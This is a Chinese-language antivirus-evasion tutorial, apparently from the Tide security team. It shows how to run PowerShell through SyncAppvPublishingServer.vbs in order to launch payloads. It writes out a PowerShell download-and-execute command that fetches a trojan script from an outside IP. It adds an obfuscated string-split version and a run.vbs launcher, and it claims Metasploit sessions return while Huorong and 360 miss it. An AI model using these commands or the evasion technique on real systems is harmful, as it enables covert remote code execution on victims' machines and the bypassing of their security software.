聲明：文中所涉及的技術、思路和工具僅供以安全爲目的的學習交流使用，任何人不得將其用於非法用途以及盈利等目的，否則後果自行承擔！

文章打包下載及相關軟件下載： https://github.com/TideSec/BypassAntiVirus

一、SyncAppvPublishingServer 簡介

Windows上有兩個版本的SyncAppVPublishingServer工具，它們是：SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他們來取代powershell。

二、SyncAppvPublishingServer 使用

在powershell下執行

SyncAppvPublishingServer.vbs break;powershell代碼

測試過程中使用的是SyncAppvPublishingServer.vbs，SyncAppvPublishingServer.exe 沒有成功

在cmd裏是無法執行powershell命令的

該命令需要在powershell裏進行執行

因此powershell腳本都可以通過SyncAppvPublishingServer.vbs來運行。

三、SyncAppvPublishingServer 執行payload

使用powershell木馬。

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/a.ps1')"

將powershell腳本進行混淆使用IEX遠程加載執行payload。

$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)

msf可正常上線。

在實戰中也可以直接寫成vbs腳本 run.vbs

Set oShell=WScript.CreateObject("WScript.Shell")

oShell.run "SyncAppvPublishingServer.vbs ;$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://47.94.80.xxx/ps/a.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

點擊run.vbs也可以正常上線。

火絨、360均沒有檢測出

放在virustotal.com上a.bat查殺率爲1/56

四、參考資料

Powershell Without Powershell.exe

https://www.youtube.com/watch?v=sema3EYnP2c

guān

zhù

wǒ

men

Tide安全團隊正式成立於2019年1月 ， 是新潮信息旗下以互聯網攻防技術研究爲目標的安全團隊，團隊致力於分享高質量原創文章、開源安全工具、交流安全技術，研究方向覆蓋網絡攻防、Web安全、移動終端、安全開發、物聯網/工控安全/AI安全等多個領域。

對安全感興趣的小夥伴可以 關注團隊官網: http://www.TideSec.com 或長按二維碼關注公衆號：